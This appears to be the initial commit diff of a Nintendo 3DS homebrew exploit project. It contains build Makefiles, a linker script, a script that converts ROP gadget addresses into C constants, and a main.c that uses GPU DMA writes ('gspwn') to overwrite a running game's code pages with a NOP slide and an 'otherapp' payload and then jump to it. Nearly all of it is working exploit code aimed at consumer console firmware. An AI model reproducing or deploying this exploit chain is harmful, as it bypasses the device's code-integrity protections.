Initial commit

Makefile

@@ -0,0 +1,25 @@
+export PYROP:="$(CURDIR)/pyrop"
+
+all: otherapp.bin ropdb/DB.py code/build game/build
+
+otherapp.bin:
+	@cp $(OTHERAPP) otherapp.bin
+
+ropdb/DB.py:
+	@cp ropdb/$(REGION).py ropdb/DB.py
+
+code/build:
+	@cd code && make
+
+game/build: rop/build
+	@cd game && make
+
+rop/build:
+	@cd rop && make
+
+clean:
+	@cd game && make clean
+	@cd rop && make clean
+	@cd code && make clean
+	@rm ropdb/DB.py
+	@rm otherapp.bin

code/Makefile

@@ -0,0 +1,75 @@
+ifeq ($(strip $(DEVKITARM)),)
+$(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
+endif
+
+
+ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
+export PATH:=$(DEVKITARM)/bin:$(PATH)
+endif
+
+include $(DEVKITARM)/3ds_rules
+
+CC = arm-none-eabi-gcc
+# LINK = arm-none-eabi-gcc
+LINK = arm-none-eabi-ld
+AS = arm-none-eabi-as
+OBJCOPY = arm-none-eabi-objcopy
+CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include
+LDFLAGS += --script=ccd00.ld -L"$(CTRULIB)/lib"
+
+CFILES = $(wildcard source/*.c)
+BINFILES = $(wildcard data/*.bin)
+OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
+OFILES += $(CFILES:source/%.c=build/%.o)
+DFILES = $(CFILES:source/%.c=build/%.d)
+SFILES = $(wildcard source/*.S)
+OFILES += $(SFILES:source/%.S=build/%.o)
+PROJECTNAME = ${shell basename "$(CURDIR)"}
+CWD = "$(CURDIR)""
+
+#---------------------------------------------------------------------------------
+# canned command sequence for binary data, taken from devkitARM
+#---------------------------------------------------------------------------------
+define bin2o
+	bin2s $< | $(AS) -o $(@)
+	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
+	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
+	echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
+endef
+
+.PHONY:=all dirs
+
+all: dirs $(PROJECTNAME).bin
+
+dirs:
+	@mkdir -p build
+
+$(PROJECTNAME).bin: $(PROJECTNAME).elf
+	$(OBJCOPY) -O binary $< $@
+
+$(PROJECTNAME).elf: $(OFILES)
+	$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) -g -lctru
+
+clean:
+	@rm -f constants.h
+	@rm -f output.map
+	@rm -rf build
+	@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin
+	@echo "all cleaned up !"
+
+-include $(DFILES)
+
+build/%.o: source/%.c constants.h
+	$(CC) $(CFLAGS) -c $< -o $@
+	@$(CC) -MM $< > build/$*.d
+
+build/%.o: source/%.S
+	$(CC) $(CFLAGS) -c $< -o $@
+	@$(CC) -MM $< > build/$*.d
+
+build/%.bin.o: data/%.bin
+	@echo $(notdir $<)
+	@$(bin2o)
+
+constants.h:
+	@python3 makeConstantsHeader.py ../ropdb/DB.py constants.h

code/ccd00.ld

@@ -0,0 +1,27 @@
+OUTPUT_ARCH(arm)
+
+MEMORY
+{
+	RAMRX (rx) : ORIGIN = 0x00384000, LENGTH = 0x00002000
+	RAMRW (rw!i) : ORIGIN = 0x08000000, LENGTH = 0x00100000
+}
+
+SECTIONS
+{
+	.text : ALIGN(0x100) {
+		build/crt0.o(.init)
+		*(.text)
+		*(.rodata)
+		_got_start = .;
+		*(.got)
+		*(.got.plt)
+		*(.data.rel.ro.local)
+		_got_end = .;
+	}
+
+	.bss : {
+		_bss_start = .;
+		*(.bss);
+	}
+	_bss_end = .;
+}

code/ccd00.specs

@@ -0,0 +1,4 @@
+%rename link old_link
+
+*link:
+%(old_link) -T ./ccd00.ld%s

code/makeConstantsHeader.py

@@ -0,0 +1,12 @@
+import sys
+import runpy
+
+cmdargs = sys.argv
+
+output_file = open(cmdargs[2], 'w')
+
+result = runpy.run_path(cmdargs[1])
+diff = set(result.keys()) - set(globals().keys())
+
+for gadget in diff:
+    output_file.write("#define " + gadget + " " + hex(result[gadget]) + "\n")

code/source/crt0.S

@@ -0,0 +1,8 @@
+.section ".init"
+.arm
+.align 0x4
+.global _start
+
+_start:
+	mov sp, #0x10000000
+	blx _main

code/source/imports.h

@@ -0,0 +1,22 @@
+#ifndef IMPORTS_H
+#define IMPORTS_H
+
+#include <3ds.h>
+#include "../constants.h"
+
+#define LINEAR_BUFFER 0x31000000
+#define APPMEMTYPE_PTR 0x1FF80030
+#define MAX_CODEBIN_SIZE 0x326000
+#define PAYLOAD_VA 0x384000
+
+static Handle* const dspHandle = (Handle*)DSP_HANDLE;
+static Handle* const gspHandle = (Handle*)GSPGPU_HANDLE;
+
+static u32** const sharedGspCmdBuf = (u32**)(GSPGPU_INTERRUPT_RECEIVER_STRUCT + 0x58);
+
+static Result (* const _GSPGPU_FlushDataCache)(Handle* handle, Handle kProcess, u32* addr, u32 size) = (void*)GSPGPU_FLUSHDATACACHE;
+static Result (* const _GSPGPU_GxTryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAddr) = (void*)GSPGPU_GXTRYENQUEUE;
+static Result (* const _DSP_UnloadComponent)(Handle* handle) = (void*)DSP_UNLOADCOMPONENT;
+static Result (* const _DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 type, u32 port) = (void*)DSP_REGISTERINTERRUPTEVENTS;
+
+#endif

code/source/main.c

@@ -0,0 +1,119 @@
+#include "imports.h"
+
+#include <3ds.h>
+#include "utils.h"
+
+#define LOOP_DEST (u8*)(LINEAR_BUFFER+0xE00000)
+#define OTHERAPP_DEST (u8*)(LINEAR_BUFFER+0xF00000)
+#define SLIDE_DEST (u8*)(LINEAR_BUFFER+0xA00000)
+
+void build_nop_slide(u32 *dst, int size)
+{
+    for (int i = 0; i < size; i++)
+		{
+        dst[i] = 0xE1A00000;
+    }
+    dst[size-1] = 0xE12FFF1E;
+}
+
+void _main()
+{
+
+	Result ret = 0;
+
+	_DSP_UnloadComponent(dspHandle);
+	_DSP_RegisterInterruptEvents(dspHandle, 0x0, 0x2, 0x2);
+
+	u32 linear_base = 0x30000000 + (*(u8*)APPMEMTYPE_PTR == 0x6 ? 0x07c00000 : 0x04000000) - MAX_CODEBIN_SIZE;
+
+  build_nop_slide((u32*)(SLIDE_DEST), 0x1000/4);
+  u32 nop_slide_VA = 0x320000;
+  u32 count = 0;
+  do
+  {
+    int k = 0;
+    int slide_pages = 0;
+    while(slide_pages < 1 && k*0x1000 < MAX_CODEBIN_SIZE)
+    {
+    	_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)LOOP_DEST, 0x1000);
+    	gspwn((void*)LOOP_DEST, (void*)(linear_base + k*0x1000), 0x1000);
+    	svcSleepThread(0x100000);
+
+    	if(!memcmp((void*)LOOP_DEST, (void*)(nop_slide_VA), 0x20))
+    	{
+    		gspwn((void*)(linear_base + k*0x1000), (void*)(SLIDE_DEST), 0x1000);
+    		svcSleepThread(0x100000);
+    		slide_pages++;
+    	}
+    	k++;
+    }
+
+    int j = 0xFFC;
+    while(*(u32*)(nop_slide_VA+j) == *(u32*)(SLIDE_DEST+j))
+    {
+      count+=4;
+      j-=4;
+    }
+    if(j < 0xFFC) ((void (*)())(nop_slide_VA+j+4))();
+
+    nop_slide_VA+=0x1000;
+  }
+  while(count < 0x6000 && nop_slide_VA < PAYLOAD_VA);
+  //((void (*)())nop_slide_VA)();
+
+
+	u32 otherapp_size = *(u32*)(OTHERAPP_PTR-4);
+  memcpy(OTHERAPP_DEST, (void*)OTHERAPP_PTR, otherapp_size);
+
+	u32 _otherapp_size = (otherapp_size + 0xFFF) & ~0xFFF;
+
+	u32 otherapp_pages_count = _otherapp_size >> 12;
+
+  unsigned int pages = 0;
+	for(unsigned int i = 0; i < MAX_CODEBIN_SIZE && (pages < otherapp_pages_count); i+=0x1000)
+	{
+		_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)LOOP_DEST, 0x1000);
+		gspwn((void*)LOOP_DEST, (void*)(linear_base + i), 0x1000);
+		svcSleepThread(0x200000);
+
+		for(u8 j = 0; j < otherapp_pages_count; j++)
+		{
+		    if(!memcmp((void*)LOOP_DEST, (void*)(0x101000 + j*0x1000), 0x20))
+			  {
+				   //otherapp_pages[j] = i;
+				   gspwn((void*)(linear_base + i), (void*)(OTHERAPP_DEST+j*0x1000), 0x1000);
+				   svcSleepThread(0x200000);
+				   pages++;
+			  }
+	   }
+  }
+		// ghetto dcache invalidation
+		// don't judge me
+int i, j;
+		// for(k=0; k<0x2; k++)
+for(j=0; j<0x4; j++)
+	for(i=0; i<0x01000000/0x4; i+=0x4)
+		((u8*)(LINEAR_BUFFER))[i+j]^=0xDEADBABE;
+
+
+u8* top_framebuffer = (u8*)(LINEAR_BUFFER+0x00100000);
+u8* low_framebuffer = &top_framebuffer[0x00046500];
+_GSPGPU_SetBufferSwap(*gspHandle, 0, (GSPGPU_FramebufferInfo){0, (u32*)top_framebuffer, (u32*)top_framebuffer, 240 * 3, (1<<8)|(1<<6)|1, 0, 0});
+_GSPGPU_SetBufferSwap(*gspHandle, 1, (GSPGPU_FramebufferInfo){0, (u32*)low_framebuffer, (u32*)low_framebuffer, 240 * 3, 1, 0, 0});
+
+	// run payload
+	{
+		void (*payload)(u32* paramlk, u32* stack_pointer) = (void*)0x00101000;
+		u32* paramblk = (u32*)LINEAR_BUFFER;
+
+		paramblk[0x1c >> 2] = GSPGPU_SETTEXTURECOPY;
+		paramblk[0x20 >> 2] = GSPGPU_FLUSHDATACACHE_WRAPPER;
+		paramblk[0x48 >> 2] = 0x8d; // flags
+		paramblk[0x58 >> 2] = GSPGPU_HANDLE;
+		paramblk[0x64 >> 2] = 0x08010000;
+
+		payload(paramblk, (u32*)(0x10000000 - 4));
+	}
+
+	*(u32*)ret = 0xdead0008;
+}